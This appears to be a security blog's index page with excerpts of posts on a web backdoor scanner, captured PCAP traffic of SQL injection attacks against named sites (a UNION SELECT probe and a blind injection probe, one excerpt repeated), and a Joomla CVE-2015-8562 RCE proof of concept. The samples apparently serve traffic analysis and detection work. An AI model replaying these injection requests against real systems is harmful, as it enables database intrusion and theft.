Syhunt Web Backdoor Scanner .LUA or .EXE – Easy Customization and Configuration

So I found this neat little script laying around, it makes looking for backdoors and webshells on webservers a cake walk. Backdoors are always changing and different hacker groups rename common backdoors so you can update this script with new intel in two seconds. To add a new filename to search simple add /newfilename in … Read more

Capsule Sticker Remote SQL Injection Vulnerability SQLi Exploit PCAP Traffic Sample

Download Capsule Sticker SQL Injection PCAP : stickersqli 2009-01-01 09:30:19.647159 PPPoE [ses 0x976] IP 117.195.143.198.2131 > 203.146.140.17.80: Flags [P.], seq 1:820, ack 1, win 65535, length 819: HTTP: GET /homenew//sticker/sticker.php?id=1%27+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/* HTTP/1.1 .. v.].!E..[..@…..u……..S.P.r,e….P…N’..GET /homenew//sticker/sticker.php?id=1%27+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/* HTTP/1.1 Host: www.musicza.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-gb,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: … Read more

Active Business Directory v2 RemoteBlind SQL Injection Attack Exploit Traffic PCAP

2009-01-01 09:36:59.374040 PPPoE [ses 0x976] IP 117.195.143.198.2308 > 208.106.128.136.80: Flags [P.], seq 1:438, ack 1, win 65535, length 437: HTTP: GET /demoactivebusinessdirectory/default.asp?catid=0+and+1=0 HTTP/1.1 .. v…!E…W?@…K_u….j.. ..PJ..(f).tP…….GET /demoactivebusinessdirectory/default.asp?catid=0+and+1=0 HTTP/1.1 Host: www.activewebsoftwares.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-gb,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 300 Connection: keep-alive 2009-01-01 09:37:00.221949 … Read more

Shell Upload RCE (CVE-2015-8562) Joomla 3.4.6 – 5.6.13 Vulnerable to Attack – Video PoC

A critical remote code execution(RCE) vulnerability was discovered in Joomla! websites. This is making a lot of noise because of the following reasons. It appears that attackers started exploiting this even before the disclosure(0-day). It is very easy to exploit this vulnerability. Almost all the versions of Joomla are vulnerable under with certain conditions. At … Read more

Active Business Directory v2 RemoteBlind SQL Injection Attack Exploit Traffic PCAP

Download Active Business DIrectory Remote Blind SQL Injection PCAP : remoteblindsql.pcap     2009-01-01 09:36:59.374040 PPPoE [ses 0x976] IP 117.195.143.198.2308 > 208.106.128.136.80: Flags [P.], seq 1:438, ack 1, win 65535, length 437: HTTP: GET /demoactivebusinessdirectory/default.asp?catid=0+and+1=0 HTTP/1.1 .. v…!E…W?@…K_u….j.. ..PJ..(f).tP…….GET /demoactivebusinessdirectory/default.asp?catid=0+and+1=0 HTTP/1.1 Host: www.activewebsoftwares.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 … Read more